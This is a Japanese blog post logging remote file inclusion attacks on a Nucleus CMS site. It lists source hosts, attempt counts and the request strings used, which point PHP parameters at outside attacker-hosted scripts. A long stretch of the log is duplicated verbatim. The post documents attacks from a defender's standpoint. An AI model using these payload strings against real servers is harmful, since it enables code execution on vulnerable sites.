Nucleusにアタックが 2
アタックは時間を開けて行われている。
1分間に数件のアタックもあるが、1日に数十件程度のアタックもある。
ADSLやFTTH接続のパソコンからのものらしいが、電源を切っているときは当然動作がなく、電源を入れ直すとアタックをはじめるタイプのようだ。
ボットに乗っ取られたPCが動作状態のときにアタックを行っているらしい。
例えば
la1aaq203.aom.mesh.ad.jp から
/pg1.php?itemid=http://school.hostinginfive.com/bike.htm?
へ、23秒間3件。その後10分間に6件。
009m54.rivo.mediatti.net から
/pg1.php?itemid=http://bikelove.hostinginfive.com/bike.htm?
で、7日間に 188件。
0x50a10e05.hrnxx8.dynamic.dsl.tele.dk から
/pg1.php?itemid=http://man.43i.net/index.htm?
で、5日間に8件。
117-53-2-189.adachi.ne.jp から
index.php?sp1=http://bikelove.hostinginfive.com/bike.htm?
で、4時間に24件。
119-172-133-243.rev.home.ne.jp から
/pg1.php?itemid=http://servicepack.sppages.com/index.htm?
で、8日間に13件。
119-231-161-44.eonet.ne.jp からは
/pg1.php?itemid=http://bikelove.hostinginfive.com/bike.htm?
で、10日間に500件。
このほか eonet.ne.jpから12日間に1014件あった。
219-105-104-36.adachi.ne.jp からは
/pg1.php?itemid=http://bikelove.hostinginfive.com/bike.htm?
へのアタックが、4日間に23件。
ocn.ne.jp からは
/pg1.php?catid=http://school.hostinginfive.com/bike.htm?
などに、以後11日間に同じアクセスが793件。
発信元は、fukuhanazo.fukushima.ocn.ne.jp、yosemiya.okinawa.ocn.ne.jp、fukuhanazo.fukushima.ocn.ne.jp、sizuokaden.shizuoka.ocn.ne.jp、hodogaya.kanagawa.ocn.ne.jp、tottori.tottori.ocn.ne.jp、tokaisakaetozai.aichi.ocn.ne.jpなどである。
123-110-112-51.cy.dynamic.lsc.net.tw からは、
/pg1.php?itemid=http://mattd.100webspace.net/bike.htm?
が、3時間に11件。
plala.or.jp からは、
http://mattd.100webspace.net/bike.htm?
http://babycaleb.fortunecity.co.uk/index.htm?
http://school.hostinginfive.com/bike.htm?
http://bikelove.hostinginfive.com/bike.htm?
などへ、11日間に 225件。
a001.ap.plala.or.jp、a004.ap.plala.or.jp、a005.ap.plala.or.jp、a014.ap.plala.or.jp、a035.ap.plala.or.jp、a040.ap.plala.or.jpからである。
mesh.ad.jp からは、
http://school.hostinginfive.com/bike.htm
http://bikelove.hostinginfive.com/bike.htm
が、12日間に 337件。
ppp.infoweb.ne.jp からは
http://school.hostinginfive.com/bike.htm
http://bikelove.hostinginfive.com/bike.htm
が、12日間に 191件。
といった様子だ。/pg1.php?itemid=http://school.hostinginfive.com/bike.htm?
へ、23秒間3件。その後10分間に6件。
009m54.rivo.mediatti.net から
/pg1.php?itemid=http://bikelove.hostinginfive.com/bike.htm?
で、7日間に 188件。
0x50a10e05.hrnxx8.dynamic.dsl.tele.dk から
/pg1.php?itemid=http://man.43i.net/index.htm?
で、5日間に8件。
117-53-2-189.adachi.ne.jp から
index.php?sp1=http://bikelove.hostinginfive.com/bike.htm?
で、4時間に24件。
119-172-133-243.rev.home.ne.jp から
/pg1.php?itemid=http://servicepack.sppages.com/index.htm?
で、8日間に13件。
119-231-161-44.eonet.ne.jp からは
/pg1.php?itemid=http://bikelove.hostinginfive.com/bike.htm?
で、10日間に500件。
このほか eonet.ne.jpから12日間に1014件あった。
219-105-104-36.adachi.ne.jp からは
/pg1.php?itemid=http://bikelove.hostinginfive.com/bike.htm?
へのアタックが、4日間に23件。
ocn.ne.jp からは
/pg1.php?catid=http://school.hostinginfive.com/bike.htm?
などに、以後11日間に同じアクセスが793件。
発信元は、fukuhanazo.fukushima.ocn.ne.jp、yosemiya.okinawa.ocn.ne.jp、fukuhanazo.fukushima.ocn.ne.jp、sizuokaden.shizuoka.ocn.ne.jp、hodogaya.kanagawa.ocn.ne.jp、tottori.tottori.ocn.ne.jp、tokaisakaetozai.aichi.ocn.ne.jpなどである。
123-110-112-51.cy.dynamic.lsc.net.tw からは、
/pg1.php?itemid=http://mattd.100webspace.net/bike.htm?
が、3時間に11件。
plala.or.jp からは、
http://mattd.100webspace.net/bike.htm?
http://babycaleb.fortunecity.co.uk/index.htm?
http://school.hostinginfive.com/bike.htm?
http://bikelove.hostinginfive.com/bike.htm?
などへ、11日間に 225件。
a001.ap.plala.or.jp、a004.ap.plala.or.jp、a005.ap.plala.or.jp、a014.ap.plala.or.jp、a035.ap.plala.or.jp、a040.ap.plala.or.jpからである。
mesh.ad.jp からは、
http://school.hostinginfive.com/bike.htm
http://bikelove.hostinginfive.com/bike.htm
が、12日間に 337件。
ppp.infoweb.ne.jp からは
http://school.hostinginfive.com/bike.htm
http://bikelove.hostinginfive.com/bike.htm
が、12日間に 191件。
http://bikelove.hostinginfive.com/ を調べてみると、
.php exploits - Security @ the Pigstyに
Index.php exploits
The hackers are trying to exploit the numerous index.php parameter exploits.
Below is the list of the last 50 attempts to exploit this on the pigstye computers.
Following that is a list of the top 50 destinations for the attempts
として
GET /index.php?topic=http://bikelove.hostinginfive.com/bike.htm? HTTP/1.1
などの送信元ホストと攻撃のリストがあった。
http://babycaleb.fortunecity.co.uk/index.htm?
http://school.hostinginfive.com/bike.htm?
http://servicepack.sppages.com/index.htm?
http://wiiman.t35.com/index.htm?
なども載っている。
さらに続く
06 Feb, 2009 | mokimoc
Comments
Leave comments
このアイテムは閲覧専用です。コメントの投稿、投票はできません。